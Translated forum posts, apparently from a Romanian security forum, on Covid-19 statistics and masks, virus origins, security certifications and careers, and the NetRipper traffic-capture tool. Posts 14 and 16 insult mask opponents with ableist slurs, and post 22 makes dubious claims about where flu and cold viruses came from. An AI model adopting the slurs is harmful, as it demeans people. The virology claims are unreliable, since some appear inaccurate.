  14. More up-to-date data: https://datelazi.ro/ - 160,000 cases, 5,600 deaths. The panic isn't justified by those 160,000 cases but by those 5,600 deaths. Which are a lot for a disease that spreads through the air. Here, yes, it's a problem, a serious one and hard to solve in practice, especially in a country like Romania with a healthcare system in ruins. The fact that there are Covid and non-Covid hospitals is a good thing. Well, as of yesterday, in Bucharest that's no longer the case, all hospitals have to provide Covid support. But look at it differently: if a person with a worse disease, like diabetes or cancer, goes to the hospital and gets infected with Covid, how is that? And what if the doctors get infected? You, or you all, how would you solve this problem? The only solution to the problem would be tests that give results extremely fast, but those don't really exist. Actually they do, but not with a good detection rate. There were also news reports that many died in nursing homes. Someone was visited, had contact with a guard, anything is possible. I wear a mask for hours and it doesn't seem to me that it gets damp. As for air humidity, it helps in that the virus stays in the air (floating) for less time. What doesn't help is the cold. I was at Cora and Mega Image yesterday, it wasn't crowded. I did see trams full of people though, that's where it's bad. At Sf. Parascheva the problem is that the old folks there weren't wearing masks and were licking the relics, besides hugging each other. And they were shouting without masks too. But I'm curious how it's going to be in about 5-6 days. It's a bit out of context. On TV there are 2-3-5 people, distanced. At the market there are hundreds of people. If I had to choose between going to the market without a mask or onto a TV set, I'd be waving at the cameras. Yes, there were discrepancies at the start between those who believed in Covid and those who didn't. But now there are few people left who don't believe and don't worry about Covid, and rightly so. Personal example: my mother. At first she didn't care, nothing's happening, that's that. Now she doesn't leave without a mask. Personal conclusion: it's not something extremely serious, but it is still serious. I don't worry about myself and young people but about the elderly and those with health problems. For example someone with diabetes. I wear a mask on the street too, not for myself but for others. As for those who say that wearing a mask takes away their freedom and that it's a muzzle: they can suck it, they're retards with the IQ of a monkey. What they don't understand is that wearing a mask isn't only about them but also about others. It's not like a seatbelt (which, go figure, doesn't take away their freedom), which is useful only for them; their actions affect those around them too. It's as if I came out on the street with a huge speaker and blasted manele at full volume. It's my right, isn't it? It's my freedom! What, does it take away my freedom to do what I want? Or to take a dump in the street. Why am I not allowed?
  15. I don't understand exactly what that document refers to, what the request was. But it makes sense, from a legal point of view, I think. It's normal for an epidemic to be declared at a certain number of cases or deaths. And the document only states that the MS (Ministry of Health) didn't issue a normative act, that's all. The problem with Covid, though, is that it spreads through aerosols. That is, very easily; it has exponential growth and there is no vaccine (e.g. as for childhood diseases). In other words, it's a special case that can be treated differently, in my opinion.
  16. Those statistics are idiotic. In our country the death rate is 3% (overall!). The death rate for seasonal flu is 0.1%. Do the math yourselves. Actually not you, but the retards who think it's a joke. At age 50+ it's nowhere near what appears in that article. PS: I ordered this book and it's arriving today: https://www.editurajunimea.ro/produs/covid-19-dimensiuni-ale-gestionarii-pandemiei/ I saw a report on Digi and it was recommended by https://ro.wikipedia.org/wiki/Alexandru-Vladimir_Ciurea (if you're too lazy to read: a neurosurgeon with over 20,000 brain surgeries performed), who wrote a chapter in it. In other words, I trust what Vlad Ciurea says more than what Karen says on who knows what website. Choose your sources of information correctly.
  17. I got a Security+ book some time ago, I looked through it and liked that it covers a lot of things that are very useful for anyone who works or wants to work in the security field. I don't know what questions are on the certification exam, but the value I see in certifications is the "training" needed for someone to get it, that is, what they learn for that certification.
  18. CompTIA Security+ is ok, I don't really know what to say about the others, since I'm not that familiar with them.
  19. Hi, theoretically you can do this from user-land too, it depends on what exactly you want to hide it from. But most likely a real anti-cheat has a kernel-mode driver and, as gigiRoman also says, you'd need a kernel-mode driver to hide it, i.e. a rootkit. My suggestion would be not to use cheats, it's simpler and more "fun".
  20. Theoretically it's possible; in practice it's very hard for an attacker to install a random application on your phone, especially if the operating system is fairly up to date. Are you sure you didn't install some weird application? Or an APK directly? Was the phone rooted? You should do a factory reset and update it, to be safe. The battery part is strange, it's not like the attacker came to your house to plug the phone in.
  21. Hi, well, first you have to decide whether you want to go the "offensive" route (e.g. penetration testing) or the "defensive" route (e.g. security analyst). But whatever it is, you need to know a bit of each: Windows, Linux, programming, protocols (e.g. HTTP, SMTP), networking (e.g. TCP/IP), cryptography, HTML/JavaScript, SQL and something about vulnerabilities and how they are exploited. Once you have all the necessary basics, you can decide what you like more, taking into account of course the "market" in Romania, what would offer you the most opportunities and, most importantly: what you would enjoy doing most.
  22. There has always been and always will be an exchange of viruses from animals to humans and from humans to animals. The rhinoviruses that generally cause the common cold went from birds to humans. Swine flu and avian flu went from humans to animals. The same happens with some nasty viruses; Covid isn't that nasty, but Ebola, for example, is, and it comes from monkeys. And actually the problem isn't that people eat animals. The problem, in the worst case, is if they're eaten uncooked. For example, a virus very similar to Ebola reached researchers in Germany who worked with butchered monkeys, probably from their blood. Most likely, in my opinion, the advantage of eating "domestic" animals is that humans have been interacting with them for tens of thousands of years and, having gone through various viruses over time, humanity has acquired good immunity. Also, animals are a very good source of "vaccines". Smallpox, which killed 30% of those infected, was eradicated with the help of cattle. There is also a cowpox which in humans did not cause death (maybe in a proportion of 2%), and it was observed that milkmaids get a much milder form of smallpox; thus, people who were infected with cowpox got a much milder form and gained immunity.
  23. If you want to find out more, I recommend "O planeta plina de virusi" (A Planet of Viruses). I bought it and read it yesterday, easy to understand and it covers a lot. Not Covid, since it was written around 2015 I think, but all the other common viruses.
  24. I think there are Java devs with more than 4K net per month, but somewhere over 10 years of experience. I mean I have no way of knowing the salary, but you can kind of tell from various things when they tell you what apartments and houses they have.
  25. Theoretically it should capture, even if it doesn't decrypt. I mean all network calls go through the send/WSASend functions (in principle) and they aren't plain-text, but they should be captured by NetRipper. What's probably happening is that that program creates a child process. In that case, NetRipper isn't injected there and has no way to capture anything. And I don't have an easy fix for this; I mean I'd have to do some work on it to add an auto-inject feature for child processes. Try the auto monitor function. Actually I don't even know how useful it would be, since it isn't quite 100% implemented. Damn, I really should take some time to work on it more, but right now I have none at all; after RST Con I'll do something.